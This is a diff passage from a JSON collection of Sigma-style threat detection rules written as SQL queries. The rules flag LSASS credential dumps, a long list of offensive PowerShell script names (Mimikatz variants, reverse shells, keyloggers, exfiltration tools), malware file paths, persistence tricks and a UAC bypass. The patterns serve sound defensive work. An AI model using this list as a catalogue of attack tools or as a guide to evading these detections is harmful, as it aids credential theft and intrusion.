"a5a2d357-1ab8-4675-a967-ef9990a59391", + "status": "experimental", + "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\'))" ], - "filename": "win_security_rdp_bluekeep_poc_scanner.yml" + "filename": "file_event_win_lsass_dump.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", - "id": "8fe1c584-ee61-444b-be21-e9054b229694", - "status": "experimental", - "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", - "author": "INIT_6", + "title": "Malicious PowerShell Scripts - FileCreation", + "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "status": "test", + "description": "Detects the creation of known offensive powershell scripts used for exploitation", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", "tags": [ "attack.execution", - "attack.t1569", - "cve.2021.1675", - "cve.2021.34527" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 
'%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AzureADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' 
OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DNSUpdate.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Powermad.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' AND TargetFilename LIKE '%.ps1' ESCAPE '\\'))" ], - "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" + "filename": "file_event_win_powershell_exploit_scripts.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher - Security", - "id": "dcf2db1f-f091-425b-a821-c05875b8925a", - "status": "experimental", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "title": "Octopus Scanner Malware", + "id": "805c55d9-31e6-4846-9878-c34c75054fe9", + "status": "test", + "description": "Detects Octopus Scanner Malware.", + "author": "NVISO", + "tags": [ + "attack.t1195", + "attack.t1195.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%\"set%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%/c%' ESCAPE '\\' OR ServiceFileName LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Cache134.dat' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\ExplorerSync.db' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_var_services_security.yml" + "filename": "file_event_win_mal_octopus_scanner.yml" }, { - "title": "Service Installed By Unusual Client - Security", - "id": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", + "title": "Potential RipZip Attack on Startup Folder", + "id": 
"a6976974-ea6f-4e97-818e-ea08625c52cb", "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "description": "Detects a phishing attack which expands a ZIP file containing a malicious shortcut.\nIf the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder.\nAdditionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.\n", + "author": "Greg (rule)", "tags": [ - "attack.privilege_escalation", - "attack.t1543" + "attack.persistence", + "attack.t1547" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ClientProcessId = '0' OR ParentProcessId = '0'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup%' ESCAPE '\\' AND TargetFilename LIKE '%.lnk.{0AFACED1-E828-11D1-9187-B532F1E9575D}%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "win_security_service_installation_by_unusal_client.yml" + "filename": "file_event_win_ripzip_attack.yml" }, { - "title": "SAM Registry Hive Handle Request", - "id": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", + "title": "Potential Persistence Via Microsoft Office Add-In", + "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", "status": "test", - "description": "Detects handles requested to SAM registry hive", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", + "author": "NVISO", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.credential_access", - 
"attack.t1552.002" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ - "Unknown" + "Legitimate add-ins" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4656' AND ObjectType = 'Key' AND ObjectName LIKE '%\\\\SAM' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\')))" ], - "filename": "win_security_sam_registry_hive_handle_request.yml" + "filename": "file_event_win_office_addin_persistence.yml" }, { - "title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security", - "id": "c39f0c81-7348-4965-ab27-2fde35a1b641", + "title": "UAC Bypass Using Windows Media Player - File", + "id": "68578b43-65df-4f81-9a9b-92f32711a951", "status": "test", - "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID 
= '5145' AND RelativeTargetName LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\OskSupport.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\'))" ], - "filename": "win_security_dcom_iertutil_dll_hijack.yml" + "filename": "file_event_win_uac_bypass_wmp.yml" }, { - "title": "Kerberos Manipulation", - "id": "f7644214-0eb0-4ace-9455-331ec4c09253", - "status": "test", - "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", - "author": "Florian Roth (Nextron Systems)", + "title": "Office Template Creation", + "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "status": "experimental", + "description": "Detects creation of template files for Microsoft Office from outside Office", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1212" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Faulty legacy applications" + "Loading a user environment from a backup or a domain controller", + "Synchronization of templates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" + "SELECT * FROM logs WHERE ((((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename 